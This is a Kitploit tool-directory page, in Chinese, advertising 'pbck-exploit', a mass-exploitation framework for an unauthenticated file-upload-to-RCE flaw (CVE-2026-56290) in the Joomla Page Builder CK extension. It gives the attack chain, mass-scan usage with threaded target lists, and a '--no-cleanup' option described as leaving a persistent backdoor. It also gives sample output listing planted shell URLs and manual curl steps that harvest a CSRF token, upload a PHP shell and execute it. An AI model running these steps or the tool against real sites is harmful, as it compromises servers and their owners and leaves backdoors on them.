Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
pbck-exploit — 📤 针对 CVE-2026-56290 的大规模利用框架 —— Page Builder CK Joomla 未授权文件上传至 RCE | Kitploit
工具/GitHubGitHub/shinthink/pbck-exploit
侦察漏洞扫描器漏洞利用框架Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubshinthink/pbck-exploit

pbck-exploit

📤 针对 CVE-2026-56290 的大规模利用框架 —— Page Builder CK Joomla 未授权文件上传至 RCE

查看仓库
3142个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PBCK-Exploit — CVE-2026-56290 Joomla Page Builder CK 利用工具

Python CVE License

Discovery CSRF RCE Cleanup Live

Joomla Page Builder CK 大规模利用与验证框架

未认证任意文件上传 → 远程代码执行



📑 目录

  • 漏洞概述
  • 受影响版本
  • 功能特性
  • 安装
  • 使用方法
  • 概念验证
  • 技术深度剖析
  • 检测方法
  • 防御与缓解
  • 免责声明
  • 参考资料

🔴 漏洞概述

CVE-2026-56290 是 Page Builder CK(com_pagebuilderck)中的一个严重级漏洞。Page Builder CK 是一款流行的 Joomla 页面构建器扩展。browse.ajaxAddPicture 控制器方法接受未认证的文件上传,并允许使用用户可控的目标路径,攻击者可以将任意 PHP 文件写入 Web 可访问的目录。

根本原因

// browse.php controller — NO authentication check
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // ← user-controlled file
    $path  = trim($input->get('path', ''));       // ← user-controlled path, only trim()!
    // ... uploads file to $path without validating the destination
}

path 参数仅仅经过 trim() 清洗 — 没有白名单、没有目录穿越检查、也没有身份验证门槛。再加上可从任何 Joomla 页面公开访问的 CSRF token,攻击者可以远程将 PHP shell 上传到任意可写目录。

影响

向量严重级别影响
未认证文件上传9.8(严重)任意 PHP 代码执行
CSRF Token 收集5.3(中危)使上传链成为可能
信息泄露5.3(中危)扩展版本指纹识别

攻击链

1. HIT Joomla homepage     →  harvest CSRF token (hex32 + value "1")
2. POST file upload         →  task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in       →  media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL            →  code executes, RCE confirmed
5. POST f=@file to shell    →  upload additional tools
6. GET ?cleanup=1           →  shell self-destructs

🟠 受影响版本

Page Builder CK 版本状态备注
3.1.1 及以下🔴 易受攻击已确认未认证上传
3.4.10 及以下🔴 易受攻击根据分析扩展的范围
3.5.10 及以下🔴 易受攻击可能存在部分已修复变体
> 3.5.10🟢 可能已修复通过 manifest XML 验证

注意: 版本通过 Joomla manifest 文件 /administrator/manifests/files/com_pagebuilderck.xml 检测。如果 manifest 不可访问,扫描器将默认把目标视为潜在易受攻击。


✨ 功能特性

🔍 侦察

  • Joomla 检测 — 两阶段:HTML 指纹 + 管理后台探测
  • PBCK 检测 — 直接路径探测 + HTML 模式匹配
  • 版本提取 — Manifest XML 解析 + HTML 正则回退
  • CSRF token 收集 — 多页面 token 提取(首页、登录、注册、管理后台)
  • 端点暴力枚举 — 1000+ 种 task/param/path 组合,带时间预算的发现

💀 利用

  • 40+ 扩展名绕过 — 大小写变换、编号变体、双扩展名、Windows 技巧
  • 20+ 目标路径 — 扩展目录、Joomla 可写目录、穿越路径
  • Shell 验证 — 基于 token 确认 PHP 可执行
  • 自动清理 — Shell 验证后自毁(?cleanup=1)
  • 实时 TXT 输出 — 实时线程安全结果写入文件
  • JSON 报告 — 包含每个目标完整详情的结构化报告

📦 安装

# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Install dependencies
pip install -r requirements.txt

# Verify
python cve_2026_56290.py --help

依赖要求

requests>=2.28.0
urllib3>=1.26.0

📖 使用方法

命令行参数

CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator

  -t, --target        Single target URL
  -f, --file          File with target URLs (one per line, # for comments)
  -o, --output        Live TXT output file (default: cve-2026-56290_live.txt)
  --json              JSON report file path (default: cve-2026-56290_report.json)
  --threads           Concurrent workers (default: 20)
  --timeout           Request timeout in seconds (default: 15)
  --no-cleanup        Leave shells on target (persistent backdoor)
  -v, --verbose       Verbose endpoint discovery output
  --known-endpoint    Skip discovery: task,file_param,folder_param

基本用法

# Single target
python cve_2026_56290.py -t https://target.com

# Mass scan from file
python cve_2026_56290.py -f targets.txt

# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"

目标文件格式

# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored

🧪 概念验证

场景 1:带实时输出的大规模扫描

$ python cve_2026_56290.py -f targets.txt -o live_results.txt
────────────────────────────────────────────────────────────
  CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
  Live TXT: live_results.txt
  2026-07-04 15:30:00
────────────────────────────────────────────────────────────

  ✅ https://target-vuln.com  [rce_confirmed]  12.4s
     PBCK: 3.4.7 [VULN]
     RCE  : ext=php | path=media/com_pagebuilderck/gfonts/
     Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

  🛡️ https://target-patched.com  [patched]  3.2s

  ✅ https://target-vuln2.com  [rce_confirmed]  15.1s
     PBCK: 3.1.0 [VULN]
     RCE  : ext=pHP | path=media/com_pagebuilderck/fonts/
     Shell: https://target-vuln2.com/media/com_pagebuilderck/fonts/pbck_x7k2m4v9.pHP
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

==================================================
  SCAN SUMMARY
==================================================
  Total           : 5
  ✅ RCE Confirmed : 2
  ⚠️  RCE Failed    : 1
  🛡️  Patched       : 1
  🔍 Need Diff     : 0
  ❌ Not Joomla    : 0
  ⏭️  No Component  : 1
  💥 Errors         : 0
==================================================

场景 2:手动复现(curl + Python)

步骤 1 — 获取 CSRF Token

curl -sk 'https://target.com/' | grep -oP 'name="[a-f0-9]{32}" value="1"'
# name="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6" value="1"

步骤 2 — 上传 PHP Shell

TOKEN="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"

curl -sk \
  -F "[email protected];type=application/x-php" \
  -F "path=media/com_pagebuilderck/gfonts/" \
  "https://target.com/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&${TOKEN}=1"

步骤 3 — 验证 RCE

curl -sk 'https://target.com/media/com_pagebuilderck/gfonts/shell.php'
# → PHP shell output, confirms code execution

场景 3:PHP Shell 载荷

扫描器部署一个自包含的上传器 shell — 无需 exec()、system() 或 eval():

下载工具